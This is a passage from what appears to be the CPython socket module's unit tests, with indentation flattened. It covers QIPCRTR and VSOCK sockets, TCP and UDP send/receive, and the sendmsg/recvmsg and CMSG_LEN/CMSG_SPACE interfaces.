with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
